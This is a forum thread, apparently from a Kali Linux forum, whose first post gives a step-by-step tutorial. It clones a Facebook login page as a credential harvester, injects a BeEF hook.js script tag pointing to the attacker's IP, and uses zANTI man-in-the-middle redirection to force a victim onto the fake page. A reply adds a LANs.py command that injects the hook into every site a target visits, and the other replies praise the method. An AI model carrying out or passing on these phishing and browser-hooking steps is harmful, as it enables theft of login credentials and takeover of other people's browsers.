Results 1 to 12 of 12

Thread: Tutorial: Easy Beef-XSS hook

  1. #1
    Join Date
    2014-Nov
    Location
    Sweden
    Posts
    21

    Tutorial: Easy Beef-XSS hook

    Hi all, just wanted to share something I found useful while pentesting my devices at home, hooking a browser with beef-xss and getting login credentials at the same time.

    Start off by starting SET (Kalimenu -> 6 -> 3 ), then choose options 1, 2, 3, 2 (Credential harvester method) and enter your IP address. Next, choose option 2 and clone a site with a login, I chose for example facebook.

    Next you need to chmod index.html to 755 so people can access your webpage
    Code:
    chmod 755 /var/www/index.html
    .

    Next we'll inject the hook.js code into the index.html file. insert the following after <head> and before </head> .
    Code:
     <script type="text/javascript" src="http://<youripaddress>:3000/hook.js"></script>
    Now is a good time to start up your apache server and launch beef-xss (Kalimenu -> 6 -> 2) and log in to the beef-xss web ui.

    Next we'll start zANTI on your NetHunter device and scan the network. Target the computer you want to hook in the list by clicking on it and then going to "Man in the Middle".
    Press the cogwheel next to "Redirect HTTP" and enter the IP of your device running beef-xss, then enable it. Finally press "on" in the top right corner to enable MITM.

    If you try accessing the internet from the attacked computer now it should automatically load up your fake facebook-site (or whichever site you chose) and the browser should be hooked in beef-xss for further exploits.

    Thanks for reading. And please let me know if there's any errors or if there's any improvements that can be made
    Last edited by unknownpwn; 2014-12-20 at 12:01.
    ){ :|:& };:

  2. #2
    what do you mean by " insert the following after [head] somewhere."

  3. #3
    Join Date
    2014-Nov
    Location
    Sweden
    Posts
    21
    Quote Originally Posted by ping View Post
    what do you mean by " insert the following after [head] somewhere."
    Insert the code in between the <head> tags (eg, after <head> and before </head> in index.html

  4. #4
    Quote Originally Posted by unknownpwn View Post
    Insert the code in between the <head> tags (eg, after <head> and before </head> in index.html
    ok thank you.

  5. #5
    Join Date
    2014-Nov
    Posts
    16
    That's actually really creative. Great tutorial.

  6. #6
    Join Date
    2014-Nov
    Location
    Sweden
    Posts
    21
    Quote Originally Posted by C1M7 View Post
    That's actually really creative. Great tutorial.
    Thank you very much
    ){ :|:& };:

  7. This is a really great tutorial, thanks a lot!

  8. Check out LANs.py on github works like...

    ./LANs.py -h [For help]
    ./LANs.py -b http://192.168.0.x:3000/hook.js [ Replace the LAN IP with whatever the network IP is that your given from the router will then should do a scan using nbtscan might need to apt-get install nbtscan pick target ctrl+c type the targets ip in from there it will inject the hook.js into every website the target go's to ]

  9. #9
    Join Date
    2015-Mar
    Posts
    1
    That's great. Thanks your sharing

  10. #10
    a great share
    Thank you very much

  11. #11
    Join Date
    2013-Apr
    Location
    Kali forums
    Posts
    805
    Thanks very much, unknownpwn.

  12. The tutorial is just wonderful
    Works for me now,thanks again!

Similar Threads

  1. BeEF how to hook
    By w0lverine00x90 in forum General Archive
    Replies: 1
    Last Post: 2015-12-04, 10:45
  2. How do I hook up a midi keyboard to kali?
    By beast911 in forum General Archive
    Replies: 0
    Last Post: 2015-08-15, 05:01

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •